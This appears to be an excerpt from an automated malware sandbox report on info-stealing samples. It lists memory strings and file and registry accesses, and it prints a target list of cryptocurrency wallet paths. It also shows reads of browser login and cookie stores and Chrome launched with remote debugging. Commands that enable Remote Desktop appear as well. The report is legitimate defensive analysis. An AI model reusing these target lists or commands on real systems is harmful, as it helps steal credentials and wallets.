                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.jsonU)
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.**V*
                                                Source: powershell.exe, 00000006.00000002.1371660458.00000000073C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: sqlcolumnencryptionkeystoreprovider
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-shm
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.js
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-wal
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite-shm
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite-wal
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Binance\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                                                Source: aV2ffcSuKl.exe | Binary or memory string: WIN_81
                                                Source: aV2ffcSuKl.exe | Binary or memory string: WIN_XP
                                                Source: 132fd7f0ed.exe, 0000003D.00000000.2228800526.0000000000382000.00000002.00000001.01000000.00000019.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                                                Source: aV2ffcSuKl.exe | Binary or memory string: WIN_XPe
                                                Source: aV2ffcSuKl.exe | Binary or memory string: WIN_VISTA
                                                Source: aV2ffcSuKl.exe | Binary or memory string: WIN_7
                                                Source: aV2ffcSuKl.exe | Binary or memory string: WIN_8
                                                Source: Yara match | File source: 00000017.00000002.2385311293.0000000001054000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                                                Source: Yara match | File source: 00000017.00000002.2378435053.000000000075E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara match | File source: Process Memory Space: ILqcVeT.exe PID: 4156, type: MEMORYSTR

                                                Remote Access Functionality

                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                Source: Yara match | File source: 62.2.7dbaa342f5.exe.dd00000.6.raw.unpack, type: UNPACKEDPE
                                                Source: Yara match | File source: 62.2.7dbaa342f5.exe.da70000.3.raw.unpack, type: UNPACKEDPE
                                                Source: Yara match | File source: 62.2.7dbaa342f5.exe.da18000.2.raw.unpack, type: UNPACKEDPE
                                                Source: Yara match | File source: 62.2.7dbaa342f5.exe.da44000.5.raw.unpack, type: UNPACKEDPE
                                                Source: Yara match | File source: 62.2.7dbaa342f5.exe.da9c000.4.raw.unpack, type: UNPACKEDPE
                                                Source: Yara match | File source: 0000003E.00000002.2594796685.000000000DA18000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara match | File source: 0000003E.00000002.2584237891.000000000D91C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara match | File source: 0000003E.00000002.2596642815.000000000DD00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara match | File source: 0000003E.00000002.2594796685.000000000DA70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara match | File source: 0000003E.00000002.2594796685.000000000DA9C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara match | File source: 0000003E.00000002.2594796685.000000000DA44000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                                                Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\10111190101\acd63ce6fe.exe, type: DROPPED
                                                Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe, type: DROPPED
                                                Source: Yara match | File source: 00000019.00000003.2063180045.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara match | File source: 00000017.00000002.2385311293.0000000000F81000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                                                Source: Yara match | File source: 00000017.00000003.1967536880.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara match | File source: 00000017.00000002.2378435053.000000000075E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara match | File source: Process Memory Space: ILqcVeT.exe PID: 4156, type: MEMORYSTR
                                                Source: Yara match | File source: Process Memory Space: rXOl0pp.exe PID: 8104, type: MEMORYSTR
                                                Source: Yara match | File source: dump.pcap, type: PCAP
                                                Source: Yara match | File source: 0000001D.00000003.2078657215.0000000004774000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara match | File source: 00000018.00000003.2018674218.0000000004774000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara match | File source: Process Memory Space: vertualiziren.exe PID: 8076, type: MEMORYSTR
                                                Source: Yara match | File source: Process Memory Space: benskvi.exe PID: 3108, type: MEMORYSTR
                                                Source: Yara match | File source: Process Memory Space: ILqcVeT.exe PID: 4156, type: MEMORYSTR
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | String found in binary or memory: net start termservice
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String found in binary or memory: net start termservice
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp; String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000B.00000003.1369460777.00000000049B0000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: net start termservice
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000B.00000003.1369460777.00000000049B0000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 